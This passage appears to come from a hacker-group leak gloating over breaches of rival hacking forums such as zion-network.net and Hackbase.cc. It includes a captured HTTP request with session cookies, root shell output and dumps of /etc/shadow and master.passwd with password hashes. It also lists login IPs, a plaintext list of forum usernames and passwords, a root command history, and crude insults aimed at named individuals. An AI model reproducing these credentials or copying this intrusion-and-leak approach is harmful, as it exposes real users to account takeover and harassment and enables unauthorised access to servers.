Aufmerksamkeit. | +| | +|____________________________________________________________________| + +We are really asking ourselves what this guy understands by the term +"Hacking-Scene". It's time to teach them a lesson in order to make +them see their own "Hacking-Scene" shatter to thousand stinking +pieces. Since the rest of the team also shows a great deal of +stupidity, that it is not even possible to show a minimal amount of +mercy. We do not want to waste time discussing that here, you better +have a look at their database backups. + +Oh by the way, we heard that some of you guys are interested in our +ninja techniques of breaking in without being noticed. So today we +will give you a 0day tutorial about how to hax a server behind a +reverse http proxy (means you need access to the proxy): + +# nc -vl 80 + +Now wait.... + +GET /board/showthread.php?t=37267 HTTP/1.1 +Host: zion-network.net +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 +Connection: keep-alive +Referer: http://zion-network.net/board/forum.php +Cookie: bb_lastvisit=1313843209; bb_lastactivity=0; bb_userid=758; bb_password=cbb1acdccd3eefbe2f3adcf4242aa561; vbulletin_collapse=c_thanks_post194596%0Ac_thanks_post196652%0Ac_thanks_post199529; IDstack=lSuObiA%3D; bb_sessionhash=39f517118ecb0ba168105281205e0a59; bb_np_notices_displayed=6; bb_thread_lastview=751d55ed819e2ad0067fbca46f48afd1ccdfededa-16-%7Bi-35252_i-1317570965_i-34784_i-1317564637_i-37212_i-1317563932_i-37236_i-1317563385_i-37200_i-1317559780_i-37227_i-1317557248_i-37177_i-1317549825_i-37217_i-1317548469_i-37211_i-1317546730_i-37180_i-1317537132_i-37184_i-1317517400_i-36756_i-1317514332_i-35132_i-1317466004_i-37190_i-1317511102_i-36548_i-1317463629_i-36054_i-1317581261_%7D; sitechrx=a5f531169bad3dcf2c7789c566346005 + +^C +# + +DONE! Of course we don't need to rely on such methods, we simply do +something like this: + + |\ .(' *) ' .................... + | \ ' .*) .'* $ ./getroot zion-network.net + |(*\ .*(// .*) .# id ...................... + |___\ // (. '*.# uid=0(root)... + ((("'\ // ' * .......... + ((c'7') /\) ,. . ., + ((((^)) / \ ,. ,, + .-')))(((-' / , + (((()) __/' + )))( | + (() + )) + +It's black magic ... can you smell the fume? ... + +# uname -a +Linux u204 2.6.32-5-amd64 #1 SMP Sun Sep 25 16:21:44 UTC 2011 x86_64 GNU/Linux + +# cat /etc/issue +Debian GNU/Linux 6.0 \n \l + +# id +uid=0(root) gid=0(root) groups=0(root) + +# cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +Debian-exim:x:101:103::/var/spool/exim4:/bin/false +statd:x:102:65534::/var/lib/nfs:/bin/false +sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin +user:x:1000:1000:user,,,:/home/user:/bin/bash +mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false +ntp:x:105:107::/home/ntp:/bin/false +messagebus:x:106:108::/var/run/dbus:/bin/false +dfg435345fgu03:x:1001:1001:,,,:/home/dfg435345fgu03:/bin/bash + +# cat /etc/shadow +root:$6$k1ECC7.L$tYZOWc8NqRaq/RGds7SIVu3IYI/oxd5IVvS1cYlR7S/kK0CrtC1o7howFMQS5gNe3FyPkXLZVA9yiyKy7LRV51:15248:0:99999:7::: +daemon:*:15248:0:99999:7::: +bin:*:15248:0:99999:7::: +sys:*:15248:0:99999:7::: +sync:*:15248:0:99999:7::: +games:*:15248:0:99999:7::: +man:*:15248:0:99999:7::: +lp:*:15248:0:99999:7::: +mail:*:15248:0:99999:7::: +news:*:15248:0:99999:7::: +uucp:*:15248:0:99999:7::: +proxy:*:15248:0:99999:7::: +www-data:*:15248:0:99999:7::: +backup:*:15248:0:99999:7::: +list:*:15248:0:99999:7::: +irc:*:15248:0:99999:7::: +gnats:*:15248:0:99999:7::: +nobody:*:15248:0:99999:7::: +libuuid:!:15248:0:99999:7::: +Debian-exim:!:15248:0:99999:7::: +statd:*:15248:0:99999:7::: +sshd:*:15248:0:99999:7::: +user:$6$/0FK/.iX$k9qkCt7AzvwIYu1yN/ofroZCzmivenSDgPzTFnPY36XeAqcF4a6vUyFSbCMAHqz61L5roXdK1nWBn.wcE89U5/:15248:0:99999:7::: +mysql:!:15248:0:99999:7::: +ntp:*:15248:0:99999:7::: +messagebus:*:15248:0:99999:7::: +dfg435345fgu03:$6$vMjSRgiC$iY1hSMMP3mHyCqRyEGtqfqTuDFyPwtdVvn/0zZXsu8B2mJMwAURxmZjtkF9xgmSO02alaVBlme.NrW1gTS5cl1:15248:0:99999:7::: + +# last +root pts/0 host-static-93-1 Thu Oct 13 03:48 gone - no logout +root pts/0 178.122.33.104 Wed Oct 12 03:58 - 03:48 (23:50) +root pts/0 83.246.185.93 Tue Oct 4 22:47 - 03:58 (7+05:11) +root pts/0 83.246.185.93 Tue Oct 4 22:46 - 22:47 (00:01) +root pts/0 83.246.185.93 Tue Oct 4 22:44 - 22:46 (00:01) +root pts/0 83.246.185.93 Tue Oct 4 22:43 - 22:44 (00:00) +root pts/0 83.246.185.93 Tue Oct 4 22:38 - 22:43 (00:04) +root pts/0 83.246.185.93 Tue Oct 4 22:37 - 22:38 (00:01) +root pts/0 85.121.52.21 Tue Oct 4 22:20 - 22:37 (00:16) +root pts/0 178.124.12.137 Tue Oct 4 22:14 - 22:20 (00:06) +root pts/0 188.24.19.198 Tue Oct 4 20:19 - 22:14 (01:55) +root pts/0 188.24.19.198 Tue Oct 4 20:16 - 20:19 (00:02) +root pts/1 80.242.104.93 Sun Oct 2 17:55 gone - no logout +root pts/1 80.242.104.93 Sun Oct 2 17:43 - 17:55 (00:11) +root pts/3 79.112.62.66 Sun Oct 2 16:11 gone - no logout +root pts/0 80.242.104.93 Sun Oct 2 14:50 - 20:16 (2+05:25) + +# alias ls="ls -la" + +# ls +total 64 +drwx------ 3 root root 4096 Oct 2 14:12 . +drwxr-xr-x 22 root root 4096 Oct 1 09:23 .. +drwx------ 2 root root 4096 Oct 1 09:23 .aptitude +-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc +-rw-r--r-- 1 root root 140 Nov 19 2007 .profile +-rwxrwxrwx 1 root root 41394 Oct 1 17:16 mysqltuner.pl + +# cd /home + +# ls +total 16 +drwxr-xr-x 4 root root 4096 Oct 1 18:32 . +drwxr-xr-x 22 root root 4096 Oct 1 09:23 .. +drwxr-xr-x 2 dfg435345fgu03 dfg435345fgu03 4096 Oct 2 14:20 dfg435345fgu03 +drwxr-xr-x 2 user user 4096 Oct 1 09:24 user + +# cd dfg435345fgu03 + +# ls +total 20 +drwxr-xr-x 2 dfg435345fgu03 dfg435345fgu03 4096 Oct 2 14:20 . +drwxr-xr-x 4 root root 4096 Oct 1 18:32 .. +-rw-r--r-- 1 dfg435345fgu03 dfg435345fgu03 220 Oct 1 18:32 .bash_logout +-rw-r--r-- 1 dfg435345fgu03 dfg435345fgu03 3184 Oct 1 18:32 .bashrc +-rw-r--r-- 1 dfg435345fgu03 dfg435345fgu03 675 Oct 1 18:32 .profile + +# cd .. + +# cd user + +# ls +total 20 +drwxr-xr-x 2 user user 4096 Oct 1 09:24 . +drwxr-xr-x 4 root root 4096 Oct 1 18:32 .. +-rw-r--r-- 1 user user 220 Oct 1 09:24 .bash_logout +-rw-r--r-- 1 user user 3184 Oct 1 09:24 .bashrc +-rw-r--r-- 1 user user 675 Oct 1 09:24 .profile + +# Nothing to see here :(^C + +# cd /var/www + +# ls +total 20 +drwxr-xr-x 3 www-data www-data 4096 Oct 1 18:49 . +drwxr-xr-x 16 root root 4096 Oct 2 14:37 .. +drwxr-xr-x 17 root root 4096 Oct 2 14:25 board +-rw-r--r-- 1 root root 111 Oct 2 05:54 index.php +-rw-r--r-- 1 root root 1200 Oct 2 04:29 robots.txt + +# cd board + +# ls -la +total 2604 +drwxr-xr-x 17 root root 4096 Oct 2 14:25 . +drwxr-xr-x 3 www-data www-data 4096 Oct 1 18:49 .. +-rw-r--r-- 1 root root 12292 May 17 2010 .DS_Store +-rw-r--r-- 1 root root 70 May 17 2010 ._.DS_Store +-rw-r--r-- 1 root root 19541 Sep 24 11:16 LICENSE +-rw-r--r-- 1 root root 44905 Sep 24 11:16 ajax.php +-rw-r--r-- 1 root root 75977 Sep 24 11:16 album.php +-rw-r--r-- 1 root root 19375 Sep 24 11:16 announcement.php +-rw-r--r-- 1 root root 4269 Sep 24 11:16 api.php +-rw-r--r-- 1 root root 3862 Sep 24 11:16 apichain.php +drwxr-xr-x 2 root root 4096 Oct 1 15:06 archive +-rw-r--r-- 1 root root 8745 Sep 24 11:16 asset.php +-rw-r--r-- 1 root root 20438 Sep 24 11:16 assetmanage.php +-rw-r--r-- 1 root root 15831 Sep 24 11:16 attachment.php +-rw-r--r-- 1 root root 6690 Sep 24 11:16 attachment_inlinemod.php +-rw-r--r-- 1 root root 1960 Sep 25 10:03 banlist.php +-rw-r--r-- 1 root root 3657 Sep 24 11:16 blog_attachment.php +-rw-r--r-- 1 root root 96572 Sep 24 11:16 calendar.php +-rw-r--r-- 1 root root 3336 Sep 24 11:16 ckeditor.php +-rw-r--r-- 1 root root 43 Sep 24 11:16 clear.gif +drwxr-xr-x 11 root root 4096 Oct 1 15:09 clientscript +-rw-r--r-- 1 root root 15382 Sep 24 11:16 converse.php +drwxr-xr-x 7 root root 4096 Oct 1 15:09 cpstyles +-rw-r--r-- 1 root root 3263 Sep 24 11:16 cron.php +-rw-r--r-- 1 root root 6206 Sep 24 11:16 css.php +drwxrwxrwx 3 root root 36864 Oct 2 10:09 customavatars +drwxr-xr-x 3 root root 4096 Oct 1 15:09 customgroupicons +drwxrwxrwx 2 root root 20480 Oct 2 07:58 customprofilepics +-rw-r--r-- 1 root root 1739 Sep 24 11:16 editor.php +-rw-r--r-- 1 root root 47262 Sep 24 11:16 editpost.php +-rw-r--r-- 1 root root 1355 Sep 24 11:16 entry.php +-rw-r--r-- 1 root root 30313 Sep 24 11:16 external.php +-rw-r--r-- 1 root root 9920 Sep 24 11:16 faq.php +-rw-r--r-- 1 root root 10134 Sep 24 11:16 favicon.ico +-rw-r--r-- 1 root root 22480 Sep 24 11:16 forum.php +-rw-r--r-- 1 root root 43139 Sep 24 11:16 forumdisplay.php +-rw-r--r-- 1 root root 2025 Sep 24 11:16 global.php +-rw-r--r-- 1 root root 152626 Sep 24 11:16 group.php +-rw-r--r-- 1 root root 26181 Sep 24 11:16 group_inlinemod.php +-rw-r--r-- 1 root root 11362 Sep 24 11:16 groupsubscription.php +-rw-r--r-- 1 root root 9016 Sep 24 11:16 image.php +drwxr-xr-x 26 root root 4096 Oct 1 15:10 images +drwxr-xr-x 9 root root 12288 Oct 1 19:34 includes +-rw-r--r-- 1 root root 114 Oct 2 05:57 index.php +-rw-r--r-- 1 root root 47257 Sep 24 11:16 infraction.php +-rw-r--r-- 1 root root 187319 Sep 24 11:17 inlinemod.php +-rw-r--r-- 1 root root 6831 May 14 02:43 itrader.php +-rw-r--r-- 1 root root 15395 Aug 25 15:30 itrader_detail.php +-rw-r--r-- 1 root root 12933 Aug 25 14:14 itrader_feedback.php +-rw-r--r-- 1 root root 1405 Apr 21 03:45 itrader_global.php +-rw-r--r-- 1 root root 23116 Aug 25 17:15 itrader_main.php +-rw-r--r-- 1 root root 3970 Apr 21 03:45 itrader_report.php +-rw-r--r-- 1 root root 1779 Aug 6 06:47 jabber.php +-rw-r--r-- 1 root root 11697 Sep 24 11:16 joinrequests.php +-rw-r--r-- 1 root root 1675 Sep 24 11:17 list.php +-rw-r--r-- 1 root root 11055 Sep 24 11:17 login.php +-rw-r--r-- 1 root root 30872 Sep 24 11:17 member.php +-rw-r--r-- 1 root root 16346 Sep 24 11:17 member_inlinemod.php +-rw-r--r-- 1 root root 40089 Sep 24 11:17 memberlist.php +drwxr-xr-x 6 root root 4096 Oct 1 15:10 mgc_cb_evo +-rw-r--r-- 1 root root 60012 May 17 2010 mgc_cb_evo.php +-rw-r--r-- 1 root root 49969 Sep 25 13:43 mgc_cb_evo_ajax.php +-rw-r--r-- 1 root root 22218 Sep 24 11:17 misc.php +-rw-r--r-- 1 root root 5866 Sep 24 11:17 mobile.php +-rw-r--r-- 1 root root 76344 Sep 24 11:17 moderation.php +-rw-r--r-- 1 root root 6733 Sep 24 11:17 moderator.php +-rw-r--r-- 1 root root 17516 Sep 24 11:17 newattachment.php +-rw-r--r-- 1 root root 41424 Sep 24 11:17 newreply.php +-rw-r--r-- 1 root root 20622 Sep 24 11:17 newthread.php +-rw-r--r-- 1 root root 21562 Sep 24 11:17 online.php +drwxr-xr-x 7 root root 4096 Oct 1 15:10 packages +-rw-r--r-- 1 root root 8526 Sep 24 11:17 payment_gateway.php +-rw-r--r-- 1 root root 13314 Sep 24 11:17 payments.php +-rw-r--r-- 1 root root 4016 Sep 24 11:17 picture.php +-rw-r--r-- 1 root root 16619 Sep 24 11:17 picture_inlinemod.php +-rw-r--r-- 1 root root 26550 Sep 24 11:17 picturecomment.php +-rw-r--r-- 1 root root 29311 Sep 24 11:17 poll.php +-rw-r--r-- 1 root root 10318 Sep 24 11:17 posthistory.php +-rw-r--r-- 1 root root 76497 Sep 24 11:17 postings.php +-rw-r--r-- 1 root root 7037 Sep 24 11:17 printthread.php +-rw-r--r-- 1 root root 81357 Sep 24 11:17 private.php +-rw-r--r-- 1 root root 163788 Sep 24 11:17 profile.php +-rw-r--r-- 1 root root 56552 Sep 24 11:17 register.php +-rw-r--r-- 1 root root 7248 Sep 24 11:17 report.php +-rw-r--r-- 1 root root 14719 Sep 24 11:17 reputation.php +-rw-r--r-- 1 root root 127 Sep 26 02:58 rules.php +-rw-r--r-- 1 root root 35091 Sep 24 11:17 search.php +-rw-r--r-- 1 root root 22872 Sep 24 11:17 sendmessage.php +-rw-r--r-- 1 root root 12879 Sep 24 11:17 showgroups.php +-rw-r--r-- 1 root root 12806 Sep 24 11:17 showpost.php +-rw-r--r-- 1 root root 82207 Sep 24 11:17 showthread.php +drwxrwxrwx 2 root root 4096 Oct 1 17:57 signaturepics +drwxr-xr-x 2 root root 4096 Oct 1 15:10 store_sitemap +-rw-r--r-- 1 root root 39241 Sep 24 11:17 subscription.php +-rw-r--r-- 1 root root 5353 Sep 24 11:17 tags.php +-rw-r--r-- 1 root root 8754 Sep 24 11:17 threadrate.php +-rw-r--r-- 1 root root 11104 Sep 24 11:17 threadtag.php +-rw-r--r-- 1 root root 61 Sep 24 11:17 uploadprogress.gif +-rw-r--r-- 1 root root 39671 Sep 24 11:17 usercp.php +-rw-r--r-- 1 root root 21703 Sep 24 11:17 usernote.php +drwxr-xr-x 13 root root 4096 Oct 1 15:10 vb +-rw-r--r-- 1 root root 28505 Sep 24 11:17 visitormessage.php +-rw-r--r-- 1 root root 126 Jul 10 18:23 vv.php +-rw-r--r-- 1 root root 1679 Sep 24 11:17 widget.php +-rw-r--r-- 1 root root 3801 Sep 24 11:17 xmlsitemap.php +drwxr-xr-x 3 root root 4096 Oct 1 15:06 xxxoinbe843bSIUf4igfn49ugnsdkmngwei9fu +drwxr-xr-x 2 root root 4096 Oct 1 15:10 zzzsf84bfsadifubSIDFUB48bf + +# head -n75 includes/config.php + +elax:jessica +emdre:lunartec1 +fair_playa77:J6Dm8hFhJ6Dm8hFh +fakedMe:eileen13 +fakerboy:frankycrew12345 +fallout:wazzzappsp3 +flon203:flon@Nex +glow:amolacar1994+#!Asdf +hades:hi1337 +hakan123:hakan +heisenb6rg:3e2w1q +homouus:lolfisch +homouus:lolfische +iks:noji987 +jannizzz:lol123 +johnlopez:948nF)§(J03kd09j3 +kaye:kaye1234 +knell:novn7L8n +krillewurm:manfred2711 +krono§:1337return1337 +kryptôn:123456789ss +lasdas:123456 +leonard:wj0oU3QJr7pgZ +lolboter:lila123 +lowbird:3mksu92k=DAK"=)213s +lucifer:3.fv!G,$7Ft/;zx,5§Y$Gh"f4tv!D§$3a%0Gy(hXH +misanthrop:vju4S4KSthdUD +miss.marpel:m4NnrxfZ6QbbyhZc +mividaloca:jmZ5rjSkjl#7Qm23+::SmqW.cY}U8c +mr. CC:Ficken1337 +mr.montana:46samira46 +muti:fuckthatshitinass22 +n1312:JKjd(()&%hf%&g837gdf +neocrow:6/4=)6$§61%)6/=1/ +nighter:Six6Pack +ooops:ichkommauskielderstadtammeer241985 +paco:13xqextraordinary37 +paulpanzer:159159159 +pelikan:B3v8aZPS +phen:utecpnkq6512429myaccount! +prosto:16471647 +ps24h:Q!ä?-sK2%8AcfÜ2.=% +purplera1n:rg5hg54gh45hg +r4nd0m:fuckyou1 +rabbit:nSRXQm3G +rad0n:12345 +reQ:Mesum3565me35650108e711lol +romulus:v678rheberhbeg +sani:19n4schk4tz385 +sips:5hgedhtbdh +slic3menic3:DkWLjh8G +snoppy0066:pueppyi1AA +sqli~hoe:ArZt1994 +st3aLth:1337!Aa +td4s:1qaz2wsx +th3p0is0n:th3p0is0nrules1337 +till7:peter123 +tivja:fabuge28 +trixx:makemoney! +unnex:selfmode3 +vendor84453:15zocker15 +veryanonym:wasnhierlosman1991 +vittula:oddset06 +wacked2:klfGKDfksdmfoc5§io +wastl:wastl24 +xK1NG:xhu12101995xier +xTonyStylesx:pol1pol2 +z4pz4r4p:AzzarackAttack +zionnoob:123456 + + ,;~;, + _/\ + \ ) + (\\ ()) + /';;,, // | +-------========{ Hackbase.cc }========))))))))))))))=m( )_ __ + | ,(.' '~/()' ' '\ +We can't say much here because we would start ~ | ||( );, +repeating ourselves. But anyway, on Hackbase.cc ( ,;.)-\ / ';, +the banner says "Hacking, Carding & more". Don't \ ( \ ( +ask why we owned them; the community and that || \\ +banner begged for it. By now you know our moti- /_( /_( +vation, you know our goals, deal with it. +But there is something else which was a thorn in our side. It seems +that Easy Laster aka ea former admin of Free-Hack (after we owned +them), hosts his 4004-Security-Project on Hackbase's server. +4004-security-project.com was a blog on that Easy constantly posts +horribly lame exploits for all kind of webapps that nobody uses while +thinking that by publishing all this bullshit he'd actually help +people. Actually it's a known fact that he sucks all kinds of cock for +vulnerabilities to put on exploit-db, just check it out: +exploit-db.com/author/?a=2201. It's hilarious and more than obvious +that he is one of those kids that try to inject a ' into every +parameter on a website. Here is what you get. + + +# uname -a +FreeBSD FreeBSD 8.2-RELEASE-p3 #0: Fri Sep 30 16:23:24 MSD 2011 amd64 + +# id +uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) + +# cat /etc/passwd +# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ +# +root:*:0:0:Charlie &:/root:/bin/csh +toor:*:0:0:Bourne-again Superuser:/root: +daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5:System &:/:/usr/sbin/nologin +bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8:News Subsystem:/:/usr/sbin/nologin +man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +webserver:*:1000:1000:User &:/home/webserver:/sbin/nologin +secunet:*:1002:1002:User &:/home/secunet:/sbin/nologin +testsite:*:1003:1003:User &:/home/testsite:/sbin/nologin +224422:*:1004:1004:User &:/home/224422:/sbin/nologin +testserver:*:1005:1005:User &:/home/testserver:/sbin/nologin +union:*:1006:1006:User &:/home/union:/sbin/nologin +hbstream:*:1001:1001:User &:/home/hbstream:/sbin/nologin + +# cat /etc/master.passwd +# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ +# +root:$1$cyeIuWcS$dKdflWuxgGARl2fSKU8gt1:0:0::0:0:Charlie &:/root:/bin/csh +toor:*:0:0::0:0:Bourne-again Superuser:/root: +daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5::0:0:System &:/:/usr/sbin/nologin +bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin +man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +webserver:$1$aJvdDZwW$s0ArlD0j8Mp7.TNNWHfb61:1000:1000::0:0:User &:/home/webserver:/sbin/nologin +secunet:$1$1rSKOEED$t2rUxxCrpjM2dEOLj60hn1:1002:1002::0:0:User &:/home/secunet:/sbin/nologin +testsite:$1$UbUABgoI$YtxsunrUQShX8SvMzc9Q61:1003:1003::0:0:User &:/home/testsite:/sbin/nologin +224422:$1$wnqKSLwS$6oJKVhnALXFO40nUQerrd0:1004:1004::0:0:User &:/home/224422:/sbin/nologin +testserver:$1$a8H.A2qA$XmH5GlVXWwXDbZOsdexeU.:1005:1005::0:0:User &:/home/testserver:/sbin/nologin +union:$1$UwJ9q.lU$kMqN2S5JqT/fLPgzlIAGO/:1006:1006::0:0:User &:/home/union:/sbin/nologin +hbstream:$1$MVeAfs8T$Fp2/xBRF0jIyT4DZIvqIf.:1001:1001::0:0:User &:/home/hbstream:/sbin/nologin + +# pwd +/root + +# ls -la +total 6292 +drwxr-xr-x 4 root wheel 512 Sep 29 09:07 . +drwxr-xr-x 18 root wheel 512 Jul 1 01:53 .. +-rw------- 1 root wheel 10971 Oct 4 14:44 .bash_history +-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc +-rw------- 1 root wheel 5249 Sep 30 21:55 .history +-rw-r--r-- 1 root wheel 155 Jan 18 2010 .k5login +-rw------- 1 root wheel 71 Jul 5 15:47 .lesshst +-rw-r--r-- 1 root wheel 303 Jan 18 2010 .login +drwx------ 3 root wheel 512 Sep 29 09:07 .mc +-rw------- 1 root wheel 18 Jul 21 17:26 .mysql_history +-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile +drwx------ 2 root wheel 512 Mar 10 2010 .ssh +-rw-r--r-- 1 root wheel 0 Jul 5 15:46 ec1902 +-rw-r--r-- 1 root wheel 168 Feb 1 2010 example.php +-rw-r--r-- 1 root wheel 476 Sep 2 06:37 forsirius.conf +-rw-r--r-- 1 root wheel 3150763 Feb 21 2011 ioncube_loaders_fre_8_x86-64.tar.gz + +# cat .bash_history +make install clean +cd /usr/ports/devel/ZendOptimizer/ +make install clean +mc -d +cd /usr/ports/ +search name=eaccelerator +make search name=eaccelerator +cd /usr/ports/www/eaccelerator +make install clean +mkdir /tmp/eaccelerator +chown www /tmp/eaccelerator +chmod 0700 /tmp/eaccelerator +mc -d +cd /usr/ports/ +make search name=ioncube +cd /usr/ports/devel/ioncube +make install clean +mc -d +cd /usr/ports/lang/php52-extensions/ +make install clean +pkg_version -vIL= +php -v +php -m +php -v +php -m +history +php -v +mc +php -v +php -v +mc +php -m +mc +mc +pkg_info|grep ioncube +pkg_info|grep php +mc -d +ifconfig +apachectl start +mc -d +fetch http://downloads2.ioncube.com/loader_downloads/ioncube_loaders_fre_8_x86-64.tar.gz +php loader-wizard.php +rm loader-wizard.php +cd /usr/ports/devel/ioncube/ +make clean +make +/usr/local/etc/rc.d/nginx start +mcedit -d /etc/rc.conf +/usr/local/etc/rc.d/nginx start +ifconfig +apachectl restart +ps ax|grep apache +ps ax|grep http +apachectl start +ps ax|grep http +cat /var/log/httpd/httpd_error.log +cat /var/log/httpd/httpd_error.log +apachectl start +ps ax|grep http +apachectl stop +apachectl start +php -v +cd / +php -v +php -v +/usr/local/etc/rc.d/nginx stop +/usr/local/etc/rc.d/apache22 restart +exit +edit /etc/rc.conf +exit +ps ax +cd /home/ +ls -l +cd webserver/ +ls -l +ls -l +mc +sockstat -l4 +vi /etc/rc.conf +jls +mc +apachectl restart +tail -n 100 /var/log/httpd/httpd_access.log +tail -n 100 /var/log/httpd/httpd_error.log +mc +tail -n 100 /var/log/httpd/httpd_error.log +mc +tail -n 100 /var/log/httpd/httpd_error.log +ls -la /home +ls -la /home/webserver/ +ls -la /home/webserver/free-hack.in/ +ls -la /home/webserver/free-hack.in/msd1/ +chmod -R 755 /home/webserver/ +exit +mcedit /etc/my.cnf +/usr/local/etc/rc.d/mysql-server restart +exit +mc +/usr/local/etc/rc.d/mysql-server restart +mcedit /usr/local/etc/php.ini +apachectl restart +php -m +php -v +exit +passwd +exit +passwd +tail -f /var/log/httpd/httpd_access.log +top +ps ax | grpe http | wc -l +ps ax | grep http | wc -l +tail -f /var/log/httpd/httpd_access.log +top +mysql -uroot -p`cat /etc/my.passwd ` +uname -a +mailq +postsuper -D ALL +postsuper -d ALL +mailq +/usr/local/etc/rc.d/mysql-server restart +mysql -uroot -p`cat /etc/my.passwd ` +mc +gstat +ps auxf +ifconfig +ee /usr/local/etc/apache22/httpd.conf +ee /usr/local/etc/nginx/nginx.conf +/usr/local/etc/rc.d/apache22 restart +/usr/local/etc/rc.d/nginx restart +/usr/local/etc/rc.d/nginx stop +ifconfig +ifconfig +head /usr/local/etc/apache22/httpd.conf +ps auxf +ee /usr/local/etc/apache22/httpd.conf +/usr/local/etc/rc.d/apache22 restart +ls -la /home/freakyfreehack/ +ee /usr/local/etc/apache22/httpd.conf +/usr/local/etc/rc.d/apache22 restart +ls -la /home/secunet/ +tail -f /var/log/httpd/httpd_access.log +/usr/local/etc/rc.d/apache22 restart +mc +/usr/local/etc/rc.d/apache22 restart +ifconfig +mc +ps wauxf +ifconfig +tail -f /var/log/httpd/httpd_access.log | grep server +killall -9 tail +tail -100 /var/log/httpd/httpd_access.log | grep server +ps wauxf +tail -1-00 /var/log/httpd/httpd_access.log | grep server +tail -1000 /var/log/httpd/httpd_access.log | grep server +ps wauxf +history +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +/usr/local/etc/rc.d/apache22 restart +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +ps ax | grep http | wc -l +mc +apachectl restart +apachectl stop +apachectl start +top +/usr/local/etc/rc.d/apache22 restart +top +head /usr/local/etc/apache22/httpd.conf +ps wauxf +ps wauxf | gre nginx +ps wauxf | grep nginx +cd /home/ +grep testsite15.w2c.ru /usr/local/etc/apache22/vhosts/* +cd 